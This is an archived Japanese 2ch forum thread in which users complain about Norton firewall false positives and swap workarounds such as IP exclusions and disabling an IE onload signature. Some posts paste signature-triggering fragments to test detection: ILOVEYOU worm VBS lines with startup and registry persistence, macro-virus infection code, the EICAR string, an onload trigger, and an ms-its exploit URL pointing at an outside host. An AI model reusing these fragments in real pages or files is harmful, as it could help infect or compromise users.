ノートン誤作動対策本部
■ このスレッドは過去ログ倉庫に格納されています
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス |
\ __ /
_ ( m ) _ピコーン
l≡l
/ ('A`) \ そうだ俺たちにはまだ「人に優しい1ch.tv」があるじゃないか!
ノヽノヽ
くく >>117
>>118
NG使えるよ、透明で登録しておくと使える
ただし>>118の言うように原因究明で困る。
というのは、普通は自動で消されて問題ないのだが
該当レスにリンクする奴がいるとひっかかる。
その時は消えたレス番を探してそいつにリンクしてる奴を探さなければならんいかんので面倒。
という事でやっと突き止めた
>>299のように該当レスに>>でリンクするのはやめてくれ・・・ 死万木偶の工作員ウザ杉。
なんの為に金払ってるんだ? なんの為のFWだ?
正確に有害なものだけを遮断するためだろう?
なんでもかんでも遮断するだけならFWなんていらねーよ。
「インタテーネッツは危険だから全ての接続を遮断します。」
これで金払えってか? ふざけるな。 とりあえずノートンを叩いて、「おれはわかってるんだぜ」と通ぶりたいんだろw ギコナビで透明あぼ〜ん(レスポップアップ時のあぼ〜ん有効にチェック)すれば
>>3しなくてもいいんだな >>451
返品とかって、、、ノートンレベルの糞ソフトも使いこなせないならネットしない方がいい。
その前にバグだらけのWindowsをMSに返してこい。
つーか、初心者はノートン使うなと。 被害妄想や詭弁や煽るだけじゃなくてさ、救護するなら
もっと建設的な意見をいえよ。叩かれていると思ってるみんなに。
NPFWを使い続ける理由を。 >>458
俺が脳豚を使い続ける理由は、10秒もあれば設定できて使えるから。
他の入れたりすれば金かかるしフリー入れても10秒ってわけにはいかないから。
そして救護だか何だかしらんけど、俺がここに書く理由は楽しいから(笑) >>454 ID:SqpGkdpj0
凄い厨が湧いたな・・・
初心者だからノートンが誤作動するってか?
初心者も糞も、どんな玄人が今回の件を回避出来てるんだ?
対策が有害無害まとめてスルーしかない(これは回避策じゃない)
ノートンにちゃんと識別させる方法を教えてくれ。 >>460
シマンテックが対策する以外に方法は無いと思うが >>460
何いってんだ?
俺は、ノートンの設定もできない初心者じゃしょーがねーってこと言ってんだよ。
>ノートンにちゃんと識別させる方法を教えてくれ。
それに何?そんな文句はシマンテックに言えよ。
脳豚に識別させるってソース開かねーんだからできるわけねーべ アホか。
俺は、文句言ってる暇あるなら設定しろと言ってるんだ。 >>462
もう、お前が初心者で厨なのは良くわかった。
IP素通りさせるのが「設定」か?(笑
初心者板で大人しくしてろ低脳。 >>462
だから煽りや詭弁は止めろといってるだろ。落ち着け。
>459をみるに、用は他のを入れるのマンドクセーし金払う気もないから
多少の不具合は設定で我慢するぜと言うことかな。
それも一つの意見だな。 >>463
IP素通りさせるのが「設定」だ。
それ以外にノートンをどうにかできると思ったのか?
変な夢みてるんじゃねーよ。ド初心者が(笑)
つーか、気に入らないなら素直に他の使えばいいだろ。
まぁ、オマエにはIP受け入れてその後にフィルタ掛けるなん(ry 6 名前:ひろゆき ◆3SHRUNYAXA 投稿日:05/01/09 00:00:25 ?## ID:RlY1yXg2
議論して、知識を得ようとしてるんじゃなくて、
勝ち負けにこだわってる人ってのは、
基本的に頭悪いと思ってます。。
>>466
だから煽(ry
本質がずれてないか、NPFWが単なる文字列に反応する事に関しての情報の蓄積が趣旨のスレだぞ。
折角だから、使用者が初心者が多いだろうからその通のテクをここで披露すればみんなのためになるぞ。 ひろゆきの”頭悪いと思ってます”シリーズの煽り、あと何通りあったっけなぁ >>453
あー、ポップアップにもできるならいいのかもね
LIVEにはあったかなー
と思ったら>>455駄目でしたか
何故かあぼんじゃ駄目なんだよね >>14やってみたけど未だにダウン板が見れない・・・
ナゼに?? >>468
確かにそうだなw
つか、正直煽りで暇潰して楽しんでいた。
荒らしてスマン。
BF/Q6J/m0 にも謝っておくよスマン。
じゃ一応俺の環境を書いておくよ 参考にならんと思うけど。
俺の場合ネットにはルーティングマシン通して接続してるから
ルーティングする際に怪しいコードを弾いてローカルで観覧してる。
つまり脳豚ファイァオールではなく別のマシンが防火壁になってる。
だから実は脳豚は関係無かったりする(´・ω・`)
そんじゃ消えます >>472
autoblockのほうで設定してるとか
1日前の俺のことだが('A`) まとめページの対処方法をやってみたら
板覧がおかしくなったんですが元に戻せますかね?
janeDoeViewです http://www.microsoft.com/japan/technet/security/advisory/911302.mspx
これによるとアクティブスクリプトを無効にすれば
HTTP MSIE JavaScript Onload Rte CodeExecの検知は必要なくなるみたいだね。
2chを信頼したくない人はこっちでやった方が良いかもよ。 \ __ /
_ (m) _ピコーン
|ミ|
/ .`´ \
('A`) そうだ諦めよう!
ノヽノヽ
くく
>>474
もう一個の設定出来たらスムーズに出来ちゃいました!
親切にありがとね。 あの、
【Norton Internet Security】
↓
【侵入防止】
↓
【AutoBlock】 ←
手動で【遮断しているコンピュータ】を【すべてを遮断解除】→↑
の繰り返しが安全じゃないですか? コードが貼られたスレ(板)開く
↓
侵入検出
↓
遮断解除
↓
取得をやりなおす
↓
侵入検出
↓
以下ループ
穴あけないと使えない んなろー!ブラッドハウンドなんぞ貼ったやつ出てコイや!めんどくせー('A`)
さっきは実況chTXでも検出したぞ >>485
それはノートン先生からログ除外すればいいんじゃ・・・(´・ω・`) なんかスレの流れが変。
「危険が嫌ならFW乗り換えろ」って意見は多数出る。
しかし金出して買った権利どうすんだ?
ユーザーに誤作動の責任なんか無いぞ。
乗り換えるにしても誤作動が原因なら当然返金だよな?
正規ユーザーがおらんのか? 工作員が邪魔してるのか? >>487
442 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/29(火) 15:01:54 ID:eTCs9aYs0(1)
>運営の人
ノートン誤作動の件なんだけど明らかに狙って書き込みしてるんだから
特定文字列を書き込みしようとした人を強制バーボンとかしてもいいんじゃないの?
448 名前: ◆SSu.zv/rvs 投稿日:2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす
449 名前: ◆MUMUMUhnYI 投稿日:2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。
私も、そう思っていたり。 >>488
誤作動するのは2chだけか?
>>489
代わりは? マックか? リナか? トロンか?
OS換えるよりFW交換の方が安くて早い。
選択肢もOSより多い。
なにより
「ゲイツさん、ノートンが誤作動します。OS代金返して」
「ノートンに言え。他のソフトじゃ誤作動しない。」
で終了。 >>486
えーと、言葉足らずだったかな
めんどくせーのは、検出されるたびにそのIPを信頼リストに入れるのが、ってこと
(ま、2chすべて信頼済みにすればいいんだろけど)
実動作しない単に貼られた文字列に反応するノートン先生もトンチキだけど、
そもそもそういうのを貼るのが困ったもんだわ('A`) 自殺したとか言ってたのに今日も元気に2chかよ磊厨w 再インストールしたら、問題解決した。
ノートン側が対応したのかな。 INSの除外にbody onload=w**w()を追加じゃ駄目なの? 181 ◆Reffiz2Zh. sage 2005/11/28(月) 11:34:22 ID:BlBjwc9/0
>178
新手のノートントラップです。
ここじゃ、明かせないのでメールにて説明しますね。
186 ◆MUMUMUhnYI sage 2005/11/28(月) 11:51:32 ID:/3xX5FyA0
>>181
メール届きました。
ううむ。なんだかなぁ。
188 ◆MUMUMUhnYI sage 2005/11/28(月) 11:52:48 ID:/3xX5FyA0
とりあえず、問題の本質は理解したです。
ノートントラップというか、問題はもっと根が深いかんじですね。
公開情報ではありますが、確かに現段階では、ここに書くのははばかられるです。
194 ◆MUMUMUhnYI sage 2005/11/28(月) 11:56:51 ID:/3xX5FyA0
ひとことだけ。
「ノートンから除外した場合(というか一般的に当然ですが)には、
不審なリンクは不用意にクリックしない」
とゆうことで。
・・・なんか裏で極秘プロジェクトでも進んでるの? >>498
公開の場に詳しく書くと、見る人が見た時悪用できるって事だと思う。
最後のは「ノートンの防御機能を無効にしたらユーザーが気をつける」
むむむさんが書いてる通り当然のこと。
ってかノートン入れてても怪しいリンクを安易に踏まないのは基本。 侵入防止のHTTP MSIE javaScript OnLoad Rte CodeExecに
更に細かく除外するコンピュータの設定がついてれば今より少しは安心出来るのに
まあそこまで細かくしすぎると管理し辛いか 昨日からノートン入れた者なのですが
ニュー速のスレを開いたら何者かが侵入を試みたので防ぎましたみたいなのが
出てそれからΝ速、+、共に見れなくなりました・・・ このスレ全部読めばそんな書き込みしなくても解決するだろうに・・・ >>503
確かにな。「2ch鯖からのHTTP MSIE javaScript OnLoad Rte CodeExec検知」だけ
除外できれば言うことなしだったのに。 <body onload=window()>
テスト >>511
<body onload=window()> 今は間カフィのほうのPCでアクセスしてるからこのスレがちゃんと見えるけど、
野トンだと>>509以降の表示がぶっ壊れるよ
なにやってんだかな、野トン先生orz どれどれ。実験。
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub ∬
酒 (´д`) < 俺、知ってるよ…。
======== \
/※※※※ゞノ ,_)
~~~~~~~~~~~~~~~~ >>510
氏ね
>>512
お前も氏ね
>>517
お前は氏ねじゃなくて死ね! c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub >>512とか>>517とかの文字列が反応するのって、
どういう誤認で誤作動するわけ?具体的に頼む >525
>>22の記事を読めばなんとなくわかるかと。 >>517の本文は専ブラのログフォルダを除外対象にしとけば無問題 ホントに無問題なのか!?
確かに反応はしなくなるが、それを逆手に利用しLogフォルダを狙ってくるかもと妄想してみる
まだじゃまくさいが*.dat毎に設定した方が… >>697
わかったか?
よし、わかったんなら席に着け。 >>697
( ´д)ヒソ(´д`)ヒソ(д` ) >>697ちゃんったらー、ちゃんと見てないからそうなるんだよ。
まったくもー。 ノートンの
侵入阻止→拡張→HTTP MSIE javaScript OnLoad Rte CodeExec
のチェックはずして、
オミトロンの
Onload Unloader
をオンにスルだけで解決するんだが。
何をそんなに騒ぐ。
専ブラはdatしか読みに行かないから、ノートンのチェック外しても
何ら問題は無い。
問題はIEの味噌も糞も一緒くたにとっとくテンポラリフォルダだ。
これもブラウザ閉じた時にキャッシュを削除する設定にしておけば
多少は安心だろう。 ノートンのインジケータを隠してたから長いこと原因に気付かなかった
やれやれ・・・ いきなりフジ実況見れなくなった。。。
まとめサイトの対策してるのに <body onload=あwindow()> ms-its:あmhtml:file://c:\
誤作動うぜぇー
■ このスレッドは過去ログ倉庫に格納されています